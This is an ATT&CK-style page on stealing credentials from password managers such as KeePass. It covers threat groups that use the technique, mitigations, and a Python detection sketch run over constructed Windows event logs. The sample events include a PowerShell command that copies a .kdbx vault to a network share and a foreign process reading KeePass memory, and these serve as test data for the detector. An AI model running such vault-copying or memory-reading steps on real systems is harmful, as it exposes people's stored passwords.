Credentials from Password Stores: Password Managers
Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible only after a user provides a master password that unlocks the database. Once the database is unlocked, the decrypted credentials, and in some implementations the master password itself, are held in the manager's process memory, while the encrypted database is stored as an ordinary file on disk.(Citation: ise Password Manager February 2019) Adversaries may therefore acquire credentials from password managers by extracting the master password and/or plain-text credentials from that process memory,(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) including by exploiting a flaw in the manager via Exploitation for Credential Access.(Citation: NVD CVE-2019-3610) Because the database is a file, adversaries may also copy it from the host and attempt to recover the master password through Password Guessing.(Citation: Cyberreason Anchor December 2019)
Procedure Examples

| Name | Description |
|---|---|
| Threat Group-3390 | Threat Group-3390 obtained a KeePass database from a compromised host.(Citation: Trend Micro DRBControl February 2020) |
| Fox Kitten | Fox Kitten has used scripts to access credential information from the KeePass database.(Citation: CISA AA20-259A Iran-Based Actor September 2020) |
| MarkiRAT | MarkiRAT can gather information from the KeePass password manager.(Citation: Kaspersky Ferocious Kitten Jun 2021) |
| Proton | Proton gathers credentials from 1Password's on-disk files.(Citation: objsee mac malware 2017) |
| TrickBot | TrickBot can steal passwords from the KeePass open source password manager.(Citation: Cyberreason Anchor December 2019) |
| Operation Wocao | During Operation Wocao, threat actors accessed and collected credentials from password managers.(Citation: FoxIT Wocao December 2019) |
Mitigations

| Mitigation | Description |
|---|---|
| Update Software | Perform regular software updates to mitigate exploitation risk, including memory-disclosure flaws in the password manager itself. |
| Software Configuration | Implement configuration changes to software (other than the operating system) to mitigate security risks associated with how the software operates. For password managers, re-lock the database after a short idle timeout so that plain-text credentials remain in memory only briefly. |
| Password Policies | Set and enforce secure password policies for accounts, including the master password that unlocks the manager; NIST SP 800-63-3 gives guidance on memorized secrets. |
Detection
Consider monitoring API calls, file read events, and process behaviour for activity that indicates another process is reading the memory of a password manager, for example a handle opened to the manager's process with memory-read access by a process that is not the manager itself or a known security agent. Also consider monitoring file reads and copies of known password manager databases (such as KeePass .kdbx files) by processes other than the manager, and command lines that reference those files.
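The description above notes that the unlocked database's secrets sit in the manager's process memory and that the encrypted vault is a file on disk, and the detection guidance says to watch process-memory access and file reads around the manager. The following added example (written for this page; it is not MITRE content or a vendor rule) runs those two checks plus a command-line check over constructed, Sysmon- and Windows-Security-style events. The process names, the allow-list, the field names and the sample events are assumptions modelled on Sysmon Event ID 10 (ProcessAccess), Sysmon Event ID 1 (ProcessCreate) and Windows Security Event ID 4663 (object access).

```python
"""Detection sketch for ATT&CK T1555.005 over constructed Sysmon/Windows-style events.

Added example for this page, not MITRE or vendor code. Event shapes follow
Sysmon EID 10, Sysmon EID 1 and Security EID 4663, but every record below is
hand-constructed sample telemetry, not a real log.
"""
import json
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Processes whose memory holds the unlocked vault (assumption: extend for your estate).
PASSWORD_MANAGER_PROCESSES = {"keepass.exe", "keepassxc.exe", "1password.exe", "bitwarden.exe"}
# Vault file extensions that live on disk and can be copied off for offline guessing.
VAULT_EXTENSIONS = (".kdbx", ".kdb", ".psafe3", ".opvault")
# Win32 process access right required by ReadProcessMemory.
PROCESS_VM_READ = 0x0010
# Source images allowed to open the manager with VM_READ (assumption: your AV/EDR).
ALLOWED_MEMORY_READERS = {"msmpeng.exe"}
# Vault path appearing on a command line, e.g. a script copying or parsing the file.
VAULT_IN_CMDLINE = re.compile(r"\.(kdbx?|psafe3|opvault)\b", re.IGNORECASE)


@dataclass(frozen=True)
class Alert:
    rule: str
    event_id: int
    detail: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_process_access(ev: Dict) -> Optional[Alert]:
    """Sysmon EID 10: a foreign process opened a handle to the manager with VM_READ."""
    target = _basename(ev["TargetImage"])
    if target not in PASSWORD_MANAGER_PROCESSES:
        return None
    source = _basename(ev["SourceImage"])
    if source == target or source in ALLOWED_MEMORY_READERS:
        return None
    granted = int(ev["GrantedAccess"], 16)  # Sysmon records this as a hex string
    if granted & PROCESS_VM_READ:
        return Alert("password_manager_memory_read", 10,
                     f"{source} -> {target} GrantedAccess=0x{granted:X}")
    return None


def check_file_access(ev: Dict) -> Optional[Alert]:
    """Security EID 4663: a vault file opened by something other than its manager.

    Only produced if a SACL audits ReadData on the vault file (assumption: it does).
    """
    obj = ev["ObjectName"]
    if not obj.lower().endswith(VAULT_EXTENSIONS):
        return None
    proc = _basename(ev["ProcessName"])
    if proc in PASSWORD_MANAGER_PROCESSES:
        return None
    return Alert("vault_file_read_by_foreign_process", 4663, f"{proc} read {obj}")


def check_process_create(ev: Dict) -> Optional[Alert]:
    """Sysmon EID 1: a vault path on the command line of a non-manager process."""
    if _basename(ev["Image"]) in PASSWORD_MANAGER_PROCESSES:
        return None
    if VAULT_IN_CMDLINE.search(ev.get("CommandLine", "")):
        return Alert("vault_path_in_command_line", 1, ev["CommandLine"])
    return None


CHECKS = {10: check_process_access, 4663: check_file_access, 1: check_process_create}


def scan(events: List[Dict]) -> List[Alert]:
    """Dispatch each event to the check for its EventID; other IDs are ignored."""
    alerts = []
    for ev in events:
        check = CHECKS.get(ev.get("EventID"))
        if check is not None:
            alert = check(ev)
            if alert is not None:
                alerts.append(alert)
    return alerts


# Constructed sample telemetry as JSON lines (kt.exe stands in for a memory-dumping tool).
SAMPLE_EVENTS = r"""
{"EventID": 10, "SourceImage": "C:\\Users\\bob\\AppData\\Local\\Temp\\kt.exe", "TargetImage": "C:\\Program Files\\KeePass\\KeePass.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 10, "SourceImage": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\MsMpEng.exe", "TargetImage": "C:\\Program Files\\KeePass\\KeePass.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Program Files\\KeePass\\KeePass.exe", "GrantedAccess": "0x1400"}
{"EventID": 4663, "ProcessName": "C:\\Program Files\\KeePass\\KeePass.exe", "ObjectName": "C:\\Users\\bob\\Documents\\Passwords.kdbx", "AccessMask": "0x1"}
{"EventID": 4663, "ProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ObjectName": "C:\\Users\\bob\\Documents\\Passwords.kdbx", "AccessMask": "0x1"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoP -c Copy-Item 'C:\\Users\\bob\\Documents\\Passwords.kdbx' \\\\fs01\\share\\p.kdbx"}
{"EventID": 1, "Image": "C:\\Program Files\\KeePass\\KeePass.exe", "CommandLine": "C:\\Program Files\\KeePass\\KeePass.exe C:\\Users\\bob\\Documents\\Passwords.kdbx"}
{"EventID": 4624, "LogonType": 2, "TargetUserName": "bob"}
"""


def load_sample_events() -> List[Dict]:
    """Parse the constructed JSON-lines sample into event dicts."""
    return [json.loads(line) for line in SAMPLE_EVENTS.strip().splitlines() if line.strip()]


if __name__ == "__main__":
    for a in scan(load_sample_events()):
        print(f"[{a.event_id}] {a.rule}: {a.detail}")
```

Of the eight constructed events only three alert: the unknown binary opening KeePass with full access, PowerShell reading the .kdbx, and the PowerShell command line that copies it to a share. The Defender engine is suppressed by the allow-list and csrss.exe by its access mask (0x1400 lacks VM_READ), while KeePass reading its own database and passing it on its own command line is normal. In practice, Security 4663 only appears for files that carry an audit SACL, and many Sysmon configurations filter EID 10 so heavily that the manager's process must be added explicitly as a TargetImage; both sources also need tuning for backup and EDR agents that legitimately touch the vault or the process.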
References
- Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China's hidden hacking groups. Retrieved October 8, 2020.
- Dahan, A. et al. (2019, December 11). Dropping Anchor: From a TrickBot Infection to the Discovery of the Anchor Malware. Retrieved September 10, 2020.
- National Vulnerability Database. (2019, October 9). CVE-2019-3610 Detail. Retrieved April 14, 2021.
- Lee, C., Schroeder, W. (n.d.). KeeThief. Retrieved February 8, 2021.
- ise. (2019, February 19). Password Managers: Under the Hood of Secrets Management. Retrieved January 22, 2021.
- CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020.
- Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.
- GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.
- Grassi, P., et al. (2017, December 1). SP 800-63-3, Digital Identity Guidelines. Retrieved January 16, 2019.
- Wardle, P. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.